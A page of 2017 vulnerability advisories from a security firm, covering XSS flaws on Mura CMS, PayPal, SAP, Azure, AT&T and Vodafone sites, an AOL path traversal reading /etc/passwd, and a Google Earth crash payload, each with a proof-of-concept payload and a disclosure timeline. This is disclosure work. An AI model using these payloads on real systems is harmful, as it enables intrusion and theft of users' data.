← Advisories 2016    

 

Advisories 2017

 

2017-001: BlueRiver Mura CMS vulnerable to Stored Cross Site Scripting Attacks via rb parameter.

Original release date: 30, 05 2017
Last revised: May 30, 2017
Severity: 7.5 CVSSv2/AV:N/AC:L/AU:N/C:P/I:P/A:P

BACKGROUND

Mura CMS is an open source content management system for CFML, created by Blue River Interactive Group.
Mura has been designed to be used by marketing departments, web designers and developers and it's widely used by important companies and organizations around the world like NATO, NASA, GSA, European Commision, Intel, P&G, USA FDA, USA Social Security Administration, USA Senate, USA Navy, USA Dept of Health and Human Services, USA Dept. of Homeland, Schneider, First Hawaian Bank, Boeing, Baylor College of Medicine and Michigan State University.

DESCRIPTION

BlueRiver Mura CMS is vulnerable to Stored Cross Site Scripting Attacks via rb parameter.
The Stored Cross Site Scripting is executed every time a user visit Mura CMS Administration Login Page.

PROOF OF CONCEPT
                   ########################################
### Stored XSS Request
########################################
GET /path/admin/index.cfm?rb=x%27;alert(document.domain);// HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1

########################################
### Response and Redirect to Stored XSS
########################################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Location: ./?muraAction=clogin.main
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:36 GMT
Connection: close
Content-Length: 0

########################################
### Redirect Request
########################################
GET /path/admin/?muraAction=clogin.main HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1


########################################
### Redirect Response with Stored XSS
########################################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: 06 Nov 1994 08:37:34 GMT
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:46 GMT
Connection: close

<!DOCTYPE html>
[...SNIP...]
<!-- Mura Vars -->
<script type="text/javascript">
var htmlEditorType='';
var context='/path';
var themepath='/path/default/includes/themes/CleanCanvasWrap';
var rb='x';alert(document.domain);//';
var siteid='default';
var sessionTimeout=10800;
var activepanel=0;
var activetab=0;
var webroot='C:\\inetpub\\wwwroot';
var fileDelim='\\';
</script>
[...SNIP...]
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

This vulnerability was verified in BlueRiver Mura CMS 6.1 running under Adobe ColdFusion.

SOLUTION

Contact vendor for a fix.

REFERENCES

Consult these external references for further information:

  • BlueRiver | Mura

   http://www.getmura.com/

  • OWASP | XSS

   https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

  • CWE | CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

   https://cwe.mitre.org/data/definitions/79.html

REVISION HISTORY

May 30, 2017: Initial release

DISCLOSURE TIMELINE

May 29, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
May 30, 2017 : Contact with Google Security Team
June 2, 2017 : Vendor Response/Feedback: this issue has been patched already in the latest 6.1 version

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-002: Paypal(dot)com self-XSS Vulnerability

Original release date: February 25, 2017
Last revised: February 27, 2017
Discovered by: Fabián Cuchietti
Severity: 2/5 (CVSSv3 Base Metrics)

BACKGROUND

PayPal Holdings, Inc. is an American company operating a worldwide online payments system that supports online money transfers and serves as an electronic alternative to traditional paper methods like checks and money orders.

DESCRIPTION

Paypal (dot) com is affected by self Cross-Site Scripting vulnerability in the "Reminder Note". The vulnerable resource does not properly check the type of the parameters passed to the application through POST requests. It allows malicious users to bypass the sanitizer and execute arbitrary HTML/script code in the context of the victim's browser.

PROOF OF CONCEPT

1) Sign in to your paypal account

2) Go to category: Tools > Forms of Payment

3) Click on Create a new payment format

4) Complete the form and click Submit

5) Go to: Manage payment formats > Edit the created payment format >

6) Memo or "Reminder Note" > Edit > Here we insert our payload, i.e: "><img src=x on error=prompt(document.domain)> > Click on Saved

7) The XSS will be executed successfully.

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://www.paypal.com/

SOLUTION

-

REFERENCES

http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CREDITS

This vulnerability has been discovered by Oscar Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

December 13, 2015 Initial release

DISCLOSURE TIMELINE

February 25, 2017   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
February 25, 2017   Contact with Paypal Security Team
February 27, 2017   Vendor Response/Feedback
February 27, 2017   Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-003: My AOL | Today's News vulnerable to Path Traversal

Original release date: June 26, 2017
Last revised: June 26, 2017
Severity: 7.8 CVSSv2:(AV:N/AC:L/Au:N/C:C/I:N/A:N)

BACKGROUND

AOL Inc. (simply known as AOL, originally known as America Online) is a web portal and online service provider based in New York, a Subsidiary of Verizon Communications, a part of Oath. AOL was one of the early pioneers of the Internet in the mid-1990s, and the most recognized brand on the web in the U.S. It originally provided a dial-up service to millions of Americans, as well as providing a web portal, e-mail, instant messaging and later a web browser following its purchase of Netscape.

DESCRIPTION

"alertswp.aol.com" is vulnerable to path traversal, so anyone can access the file system remotely.

PROOF OF CONCEPT
http://alertswp.aol.com/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
BUSINESS IMPACT

Access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

SYSTEMS AFFECTED

Current "alertswp.aol.com" Portal site.

SOLUTION

-

REFERENCES

https://www.owasp.org/index.php/Path_Traversal

REVISION HISTORY

June 26, 2017 : Initial release

DISCLOSURE TIMELINE

June 26, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
June 26, 2017 : Advisory comunicated to AOL security team

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-008: XSS Reflected found in the SAP events portal.

Original release date: 26, 07 2017
Last revised: July 26, 2017
Severity: 4.3 CVSSv2/(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

SAP is a german multinational software corporation that makes enterprise software to manage business operations and customer relations.

DESCRIPTION

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT
                   http://events.sap.com/sapandasug/en/session/pixwptpx.asp?1337`};%3C/script%3E%3Csvg/onload=confirm`1`%3E
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

http://events.sap.com/

SOLUTION

Contact vendor for a fix.

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 26, 2017 : Initial release

DISCLOSURE TIMELINE

July 26, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 26, 2017 : Contact with SAP Security Team.
August 17, 2017 : SAP confirms the problem is fixed.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-010: Google Earth 'QtWebKit4' NULL Pointer Dereference Vulnerability

Original release date: January 20, 2016
Last revised: January 20, 2016
Discovered by: Fabián Cuchietti
Severity: 4/5

BACKGROUND

Google Earth is a virtual globe, map and geographical information program that was originally called EarthViewer 3D created by Keyhole, Inc, a Central Intelligence Agency (CIA) funded company acquired by Google in 2004.

DESCRIPTION

NULL pointer dereference erros are common in C/C++ languages. Pointer is a programming language data type that references a location in memory. Once the value of the location is obtained by the pointer, this pointer is considered dereferenced. The NULL pointer dereference weakness occurs where application dereferences a pointer that is expected to be a valid address but instead is equal to NULL.

PROOF OF CONCEPT
1) Open Google Earth

2) My Places

3) Right click> Add> Folder

4) Select a name for your folder

5) Description: Here we insert our payload > OK

{Payload: <script type="text/javascript">
    String.prototype.repeat = function( num )
    {return new Array( num + 1 ).join( this );}
    var i=0;
    var r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9*9/9*9;
    var bib=String.fromCharCode(60, 120, 104, 116, 58, 97, 99, 114,
    111, 110, 121, 109, 32, 115, 116, 121, 108, 101, 61, 34, 102, 111,
    110, 116, 58, 49, 48, 48, 48, 48, 48, 37, 32, 102, 105, 120, 101, 100,
    115, 121, 115, 59, 32, 115, 116, 121, 108, 101, 61, 34, 120, 115, 115,
    58, 101, 120, 112, 114, 101, 115, 115, 105, 111, 110, 40, 97, 108, 101,
    114, 116, 40, 49, 41, 41, 34, 32, 32, 45, 109, 111, 122,
    45, 98)+r+String.fromCharCode(105, 110, 100, 105, 110, 103, 58, 117,
    114, 108, 40, 35, 49, 49, 41, 59, 32, 102, 111, 110, 116, 45, 102, 97,
    109, 105, 108, 121, 58, 102, 105, 120, 101, 100, 115, 121, 115, 59, 34,
    62, 49, 32, 49, 60, 47, 120, 104, 116, 58, 97, 99, 114, 111, 110, 121, 109,
    62, 10);
    document.write(bib.repeat(9999999));
   </script> }
  
6) Click the folder created with the payload



DUMP:

FAULTING_IP:
+89cde
00000000 ??              ???

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 00000000
Attempt to execute non-executable address 00000000

PROCESS_NAME:  googleearth.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  00000000

WRITE_ADDRESS:  00000000

FOLLOWUP_IP:
QtWebKit4+89cde
5c9f9cde ??              ???

FAILED_INSTRUCTION_ADDRESS:
+89cde
00000000 ??              ???

FAULTING_THREAD:  00001044

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_NULL

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_NULL

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL

LAST_CONTROL_TRANSFER:  from 5c9f9cde to 00000000

STACK_TEXT: 
WARNING: Frame IP not in any known module. Following frames may be wrong.
002cafb8 5c9f9cde 002cb05c 5c9b74f1 5e9c7916 0x0
002cafbc 002cb05c 5c9b74f1 5e9c7916 00000000 QtWebKit4+0x89cde
002cafc0 5c9b74f1 5e9c7916 00000000 00000000 0x2cb05c
002cb05c 00000000 00000000 00000000 00000000 QtWebKit4+0x474f1


STACK_COMMAND:  ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  qtwebkit4+89cde

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: QtWebKit4

IMAGE_NAME:  QtWebKit4.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  4e010a08

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL_c0000005_QtWebKit4.dll!Unknown
BUSINESS IMPACT

In most cases, NULL pointer dereference errors result in the crash of application however, remote code execution is possible under certain circumstances. Depending on privileges of the application, this weakness can result in a denial of service attack against the entire system or can be used to gain complete control over it.

SYSTEMS AFFECTED

https://www.google.com/earth/

SOLUTION

-

REFERENCES

http://www.isecauditors.com
https://www.owasp.org/index.php/Null-pointer_dereference
http://cwe.mitre.org/data/definitions/476.html

CREDITS

This vulnerability has been discovered by Oscar Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

December 13, 2015 Initial release.

DISCLOSURE TIMELINE

December 13, 2015   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
December 13, 2015   Contact with Google Security Team
December 14, 2015   Vendor Response/Feedback
January  20, 2016   Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-012: XSS Reflected found in the Microsoft Azure Marketplace website

Original release date: July 31, 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2/(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

Microsoft Corporation is an American multinational technology company headquartered in Redmond, Washington. It develops, manufactures, licenses, supports and sells computer software, consumer electronics, personal computers, and services.

DESCRIPTION

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT
https://azuremarketplace.microsoft.com/es-es%22%5Ealert(document.domain)%5E%22/marketplace/
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://azuremarketplace.microsoft.com/

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017: Initial release

DISCLOSURE TIMELINE

July 31, 2017: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017: Contact with Microsoft Security Team.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-014: XSS Reflected found in the AT&T Reward Center portal

Original release date: July 31, 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2/(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

AT&T Inc. is an American multinational telecommunications conglomerate, headquartered at Whitacre Tower in downtown Dallas, Texas. AT&T is the world's largest telecommunications company. AT&T is the second largest provider of mobile telephone services and the largest provider of fixed telephone services in the United States, and also provides broadband subscription television services through DirecTV; combined with AT&T's legacy U-verse service, this also makes AT&T the largest pay television operator.

DESCRIPTION

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT
https://rewardcenter.att.com/homee.aspx'^self[0x10f8809.toString`36`](document.domain)^'
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://rewardcenter.att.com/

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017: Initial release

DISCLOSURE TIMELINE

July 31, 2017: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017: Contact with AT&T Security Team.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-015: XSS Reflected found in the AT&T Reward Center portal

Original release date: July 31, 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2/(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

AT&T Inc. is an American multinational telecommunications conglomerate, headquartered at Whitacre Tower in downtown Dallas, Texas. AT&T is the world's largest telecommunications company. AT&T is the second largest provider of mobile telephone services and the largest provider of fixed telephone services in the United States, and also provides broadband subscription television services through DirecTV; combined with AT&T's legacy U-verse service, this also makes AT&T the largest pay television operator.

DESCRIPTION

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT
http://vietnamese.att.com//english/modals/language-model-page.html?pageUrl=x" >=<svG+++onload="confirm(document.domain)"x="http://www.n.com&pageUrl=x
http://polish.att.com//english/modals/language-model-page.html?pageUrl=x" >=<svG+++onload="confirm(document.domain)"x="http://www.n.com&pageUrl=x
http://japanese.att.com//english/modals/language-model-page.html?pageUrl=x" >=<svG+++onload="confirm(document.domain)"x="http://www.n.com&pageUrl=x
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

Multilanguage AT&T portal.

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017: Initial release

DISCLOSURE TIMELINE

July 31, 2017: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017: Contact with AT&T Security Team.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-016: XSS Reflected found in the Vodafone German Shop.

Original release date: 31, 07 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2 / (AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

Vodafone Group is a British multinational telecommunications company, with headquarters in London.

DESCRIPTION

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT
https://shop.vodafone.de/Shop/wlan-repeater/?b_id=173818321%27%3bprompt(document.domain,document.cookie)%2f%2f&c_id=kdg_cic_607:fq0_f_csc_speed_wlan&j_id=ConConPer607F
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://shop.vodafone.de/

SOLUTION

-

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017 : Initial release

DISCLOSURE TIMELINE

July 31, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017 : Contact with Vodafone Deutschland Security Team.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-017: XSS Reflected found in a Vodafone Deutschland website.

Original release date: 31, 07 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2 / (AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

Vodafone Group is a British multinational telecommunications company, with headquarters in London.

DESCRIPTION

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT
https://mvtc112.vodafone.de/ussa/resetPasswordEMail/resetPasswordEMailFallback.ftel?name={{vm.name}}&partnerId=myvf%27-confirm(document.domain)-%27&errorUrl=%2Fussa%2FresetPasswordEMail%2FresetPasswordEMailFallback.ftel%26partnerId%3Dmyvf
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://mvtc112.vodafone.de/

SOLUTION

-

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017 : Initial release

DISCLOSURE TIMELINE

July 31, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017 : Contact with Vodafone Deutschland Security Team.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

 

← Advisories 2016